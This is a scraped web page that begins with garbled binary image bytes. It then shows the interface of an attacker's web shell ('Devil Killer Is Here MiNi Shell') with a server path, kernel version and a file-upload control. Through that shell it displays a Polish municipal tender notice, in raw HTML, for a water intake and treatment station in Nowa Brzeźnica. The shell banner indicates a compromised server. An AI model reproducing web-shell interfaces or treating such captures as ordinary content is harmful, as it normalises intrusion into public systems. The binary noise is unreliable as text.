JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240125/0006693701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ujęcia wody w Gminie Nowa Brzeźnica </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA NOWA BRZEŹNICA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398669</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 103</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Brzeźnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-331</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@nowabrzeznica.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">nowabrzeznica.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ujęcia wody w Gminie Nowa Brzeźnica </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4b14cf00-bb70-11ee-b7da-22bd761ba7f3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00066937</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00026160/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa ujęcia wody w Gminie Nowa Brzeźnica</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> nowabrzeznica.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">nowabrzeznica.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Platformy Marketplanet. Dopuszczalny format<br/>przesyłanych danych tj. plików o wielkości do 100 MB.<br/>Pozostał informację są zwarte w Rozdziale I SWZ - IDW.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z RODO tj. rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1). Pozostałe informacje dot. RODO zawarte zostały w Rozdziału I<br/>Specyfikacji Warunków Zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">1</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zaprojektowanie i wybudowanie ujęcia wody oraz stacji uzdatniania wraz z infrastrukturą towarzyszącą w m. Konstantynów na dz. Nr 85/7 gm. Nowa Brzeźnica. Zamawiający przewiduje, że wskazane miejsce lokalizacji ujęcia i SUW zapewni oczekiwaną wydajność i jakość wód. Miarą zapewnienia odpowiedniej jakości wody pitnej będzie gwarancja osiągnięcia parametrów zgodnych z Rozporządzeniem Ministra Zdrowia z dnia 7 grudnia 2017r. w sprawie wymagań dotyczących jakości wody przeznaczonej do spożycia przez ludzi. Wykonawca zobowiązany jest opracować dokumentację projektową wraz z uzyskaniem niezbędnych pozwoleń i uzgodnień, a następnie wykonać roboty budowlane zgodnie z opracowaną dokumentacją. W formie „Zaprojektuj i wybuduj”.<br/>Zakres zasilania z ujęcia Konstantynów obejmuje miejscowości:<br/>a)	Konstantynów,<br/>b)	Dworszowice Kościelne,<br/>c)	Madera,<br/>d)	Zimna Woda,<br/>e)	Stoczki.<br/>W ogólnym ujęciu zamówienie obejmuje :<br/><br/>1)	wykonanie i zatwierdzenie projektu robót geologicznych dla wykonania ujęcia wody <br/> o wydajności do 40 m3/h i głębokości do 100 m npt. – studnia szt.1;<br/>2)	wykonanie studni ujęcia wody i opracowanie dokumentacji hydrogeologicznej wraz <br/>z przeprowadzeniem analiz wody;<br/>3)	uzyskanie pozwolenia wodnoprawnego na wykonanie ujęcia wody;<br/>4)	wykonanie operatu wodnoprawnego i uzyskanie pozwolenia na pobór wody;<br/>5)	wykonanie opinii o warunkach gruntowo – wodnych;<br/>6)	sporządzenie projektu zagospodarowania oraz projektu architektoniczno budowlanego <br/>i uzyskanie dla niego wynikających z przepisów: decyzji, opinii, zgód, uzgodnień <br/>i pozwoleń;<br/>7)	zakres projektu:<br/>a) zagospodarowanie terenu stacji wodociągowej,<br/>b) część technologiczna i instalacyjna,<br/>c) część budowlana i konstrukcyjna,<br/>d) część elektryczna,<br/> e) automatyka i sterowanie,<br/>f) zjazd z działki nr ew. 85/7 na teren z drogi krajowej nr 42,<br/>g) drogi, utwardzenie terenu oraz jego ukształtowanie.<br/>8)	sporządzenie projektów technicznych;<br/>9)	wykonanie robót budowlanych wraz z wszelkimi dostawami na podstawie powyższych projektów;<br/>10)	wykonanie kompletnego ujęcia i budynku SUW z technologią oraz niezbędną infrastrukturą;<br/>11)	zaprojektowanie i wykonanie odprowadzenia wód popłucznych do zbiornika naziemnego z rozsączeniem na działkę inwestora;<br/>12)	zaprojektowanie i wykonanie dwóch zbiorników naziemnych stalowych lub w konstrukcji żelbetowej wody pitnej o poj. V-75m3 każdy;<br/>13)	połączenie stacji SUW z istniejącym wodociągiem DN 160 na terenie działki 85/7;<br/>14)	wykonanie rozruchu technologicznego, przeprowadzenie prób i badań wymaganych dla sieci i obiektów;<br/>15)	przygotowanie dokumentów związanych z oddaniem wybudowanych sieci i obiektów w użytkowanie;<br/>16)	wykonanie inwentaryzacji geodezyjnej powykonawczej;<br/>17)	pozyskanie w imieniu Inwestora pozwolenia na użytkowanie obiektu;<br/>18)	ubezpieczenie budowy z tytułu:<br/>a)	zniszczenia wykonanych robót i materiałów podczas budowy;<br/>b)	zniszczenia własności prywatnej osób trzecich spowodowanego działaniami lub niedopatrzeniami wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">18.1.	Zamawiający dokona wyboru oferty najkorzystniejszej spośród ofert nie odrzuconych na podstawie art. 226 Pzp. <br/>18.2.	Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami:<br/>18.2.1.	cena oferty (C) – 100%<br/>18.3.	Sposób oceny ofert:<br/>W kryterium „cena oferty” w którym zamawiającemu zależy, aby wykonawca przedstawił jak najniższą wartość (cena), zostanie zastosowany następujący wzór: <br/>Liczba Cn<br/>zdobytych (C) = ----------- x 100 x waga kryterium 100%<br/>punktów Cb<br/>Gdzie:<br/>Cn – cena najniższa wśród ofert nie odrzuconych<br/>Cb – cena oferty badanej<br/>100	– wskaźnik stały<br/>100% – procentowe znaczenie kryterium ceny<br/>Liczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert przez cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 100%.<br/>18.4.	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów w kryterium oceny ofert.<br/>18.5.	Zamawiający zastosuje zaokrąglanie każdego wyniku do dwóch miejsc po przecinku.<br/>18.6.	Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów <br/>i usług (Dz. U. 2020 r. poz. 106, z późn. zm. ), dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. <br/>18.7.	W ofercie, o której mowa w pkt 18.6., wykonawca ma obowiązek:<br/>18.7.1.	poinformowania zamawiającego, że wybór jego oferty będzie prowadził do powstania u zamawiającego obowiązku podatkowego;<br/>18.7.2.	wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>18.7.3.	wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym zamawiającego, bez kwoty podatku;<br/>18.7.4.	wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą wykonawcy, będzie miała zastosowanie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres części 2 tj. pełnienia nadzoru inwestorskiego obejmuje w szczególności: <br/>1)	Uzgodnienia z Zamawiającym i Wykonawcą robót budowlanych na etapie przygotowywania koncepcji projektu oraz projektu budowlanego i wykonawczego wielobranżowego, wraz z jego sprawdzeniem zgodności z programem funkcjonalno – użytkowym dla przedmiotowej inwestycji;<br/>2)	Weryfikacja dokumentacji projektowej wielobranżowych tj. projektów budowlanych, wykonawczych w branżach: ogólnobudowlanej, sanitarnej i elektrycznej zakończonej wydaniem opinii w zakresie zgodności z obowiązującymi przepisami i zasadami wiedzy technicznej;<br/>3)	Weryfikacja kosztorysów i specyfikacji technicznych wykonania i odbioru robót wykonanych przez wykonawcę robót budowlanych;<br/>4)	analizę merytoryczną dokumentacji technicznej celem właściwej realizacji pod względem kolejności robót, zastosowanych materiałów i rozwiązań technicznych;<br/>5)	pełnienie kompleksowego nadzoru inwestorskiego w poszczególnych branżach (budowlanej, drogowej, elektrycznej, wod.-kan., telekomunikacyjnej) nad robotami budowlanymi opisanymi w dokumentacji projektowej wraz z wymaganiami szczegółowymi określonymi w SIWZ i Umowie na roboty budowlane zgodnie<br/>z przedmiotem zamówienia dla części 1: „Budowa ujęcia wody w Gminie Nowa Brzeźnica”;<br/>6)	organizowanie, prowadzenie i protokołowanie narad koordynacyjnych z udziałem kierownika budowy i/lub kierowników robót branżowych, przedstawicieli Zamawiającego, wykonawców robót oraz innych zaproszonych osób; celem narad koordynacyjnych będzie omawianie bieżących spraw dotyczących wykonania i zaawansowania robót;<br/>7)	reprezentowanie Inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z dokumentacją projektową, Przepisami Prawa Budowlanego, warunkami technicznymi, obowiązującymi normami oraz zasadami wiedzy technicznej, zasadami bezpieczeństwa i porządku publicznego (w tym BHP i P.POŻ.), jak również zawartą umową pomiędzy Inwestorem a wykonawcą robót budowlanych realizowanych w ramach zadania inwestycyjnego;<br/>8)	kontrolę materiałów i urządzeń dostarczanych na budowę, sprawdzanie ich jakości, zgodności z przedstawionymi dokumentami uprawniającymi do ich stosowania i dokumentacją wykonawczą, a w szczególności zapobieganie zastosowaniu materiałów wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie;<br/>9)	sprawdzanie jakości wykonanych robót, wbudowanych wyrobów i urządzeń, w szczególności pod kątem ich zgodności z ofertą wykonawcy oraz dokumentacją projektową;<br/>10)	ciągłą kontrolę budowy w okresie trwania robót, obecność na budowie na każde żądanie Zamawiającego; Zamawiający dopuszcza do dłuższego niż 7 dni braku kontroli budowy w okresie trwania robót jedynie w nagłych losowych przypadkach oraz po wcześniejszym uzgodnieniu z przedstawicielem Zamawiającego okresu nieobecności; <br/>11)	zapoznanie się z treścią umów zawartych przez Zamawiającego z Wykonawcą robót budowlanych i nadzorowanie prawidłowego wykonywania tych umów, a w szczególności przestrzeganie harmonogramów realizacyjnych, i koordynowanie robót w poszczególnych branżach;<br/>12)	sprawdzanie i odbiór robót budowlanych, w tym również ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych oraz przygotowanie i udział w czynnościach odbiorowych. Wymaga się, aby Inspektor nadzoru inwestorskiego dokonał odbioru zgłoszonych przez Wykonawcę robót budowalnych robót zanikających i ulegających zakryciu oraz uczestniczył w próbach i odbiorach technicznych niezwłocznie, nie później jednak niż 3 dni robocze od daty zgłoszenia przez Wykonawcę robót budowlanych gotowości do odbioru i prób;<br/>13)	protokolarne potwierdzanie faktycznie wykonanych robót (bez prawa zwiększania zakresu robót) oraz usunięcia wad, a także kontrolowanie rozliczeń budowy z uwzględnieniem stanu zaawansowania robót;<br/>14)	akceptowanie, po uzgodnieniu z Zamawiającym, robót dodatkowych i zamiennych;<br/>15)	rozstrzyganie wątpliwości i sporów natury technicznej powstałych w toku prowadzonych robót; <br/>16)	udostępnianie Zamawiającemu na każde żądanie (pisemne bądź ustne) wszystkich dokumentów związanych z realizacją inwestycji w terminie do 3 dni, jeżeli jednak stworzenie tychże dokumentów (np. wyniki przeprowadzonych badań) nie będzie możliwe do wykonania w tym terminie, pisemne zobowiązanie inspektora co do terminu ich przekazania; <br/>17)	przyjęcie od wykonawcy robót budowlanych i parafowanie po sprawdzeniu dokumentacji powykonawczej wraz z atestami, certyfikatami na znak bezpieczeństwa, deklaracjami zgodności wbudowanych materiałów itp. oraz inwentaryzacji geodezyjnej;<br/>18)	sprawdzanie i opiniowanie kosztorysów rozliczeniowych (w tym dodatkowych, zamiennych i zaniechanych) oraz harmonogramu rzeczowo-finansowego robót w terminie 7 dni od dnia dostarczenia ich przez wykonawców; <br/>19)	uczestnictwo w przeglądach gwarancyjnych w okresie gwarancji i rękojmi;<br/>20)	w zakres niniejszego zamówienia wchodzi również nadzór nad ewentualnymi robotami zamiennymi i dodatkowymi wykonywanymi przez Wykonawcę robót dla niniejszego zadania;<br/>21)	kontrola i prowadzenie wraz z kierownikiem budowy rozliczeń materiałów pochodzących z rozbiórki/demontażu przez cały czas realizacji zadania inwestycyjnego;<br/>22)	zawiadomienie Inwestora o każdym przypadku przebywania na terenie budowy osób nieupoważnionych do wykonywania przedmiotu zamówienia w szczególności niezgłoszonych w trybie art. 6471 kodeksu cywilnego Zamawiającemu podwykonawców, firm i innych osób trzecich, a biorących udział w wykonaniu przedmiotu umowy;<br/>23)	ocenianie wszelkich roszczeń i problemów wynikłych podczas wykonywania robót budowlanych i zgłaszanych przez wykonawcę robót budowlanych oraz rekomendowanie rozwiązań zapobiegającym sporom i opóźnieniom, gdy jest to wykonalne;<br/>24)	w zakresie niniejszego zamówienia wchodzi również nadzór nad robotami wykonywanymi przez podwykonawców dla danego zadania inwestycyjnego;<br/>25)	egzekwowanie utrzymywania porządku na Terenie budowy;<br/>26)	egzekwowanie od Wykonawcy Umowy Robót budowlanych przebywania w trakcie prowadzenia robót Kierownika budowy oraz kierowników robót branżowych na Terenie budowy oraz aby wykonywali swoje obowiązki z należytą starannością; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71248000-8 - Nadzór nad projektem i dokumentacją</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">18.1.	Zamawiający dokona wyboru oferty najkorzystniejszej spośród ofert nie odrzuconych na podstawie art. 226 Pzp. <br/>18.2.	Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami:<br/>18.2.1.	cena oferty (C) – 100%<br/>18.3.	Sposób oceny ofert:<br/>W kryterium „cena oferty” w którym zamawiającemu zależy, aby wykonawca przedstawił jak najniższą wartość (cena), zostanie zastosowany następujący wzór: <br/>Liczba Cn<br/>zdobytych (C) = ----------- x 100 x waga kryterium 100%<br/>punktów Cb<br/>Gdzie:<br/>Cn – cena najniższa wśród ofert nie odrzuconych<br/>Cb – cena oferty badanej<br/>100	– wskaźnik stały<br/>100% – procentowe znaczenie kryterium ceny<br/>Liczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert przez cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 100%.<br/>18.4.	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów w kryterium oceny ofert.<br/>18.5.	Zamawiający zastosuje zaokrąglanie każdego wyniku do dwóch miejsc po przecinku.<br/>18.6.	Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów <br/>i usług (Dz. U. 2020 r. poz. 106, z późn. zm. ), dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. <br/>18.7.	W ofercie, o której mowa w pkt 18.6., wykonawca ma obowiązek:<br/>18.7.1.	poinformowania zamawiającego, że wybór jego oferty będzie prowadził do powstania u zamawiającego obowiązku podatkowego;<br/>18.7.2.	wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>18.7.3.	wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym zamawiającego, bez kwoty podatku;<br/>18.7.4.	wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą wykonawcy, będzie miała zastosowanie.</span></h3> <h3 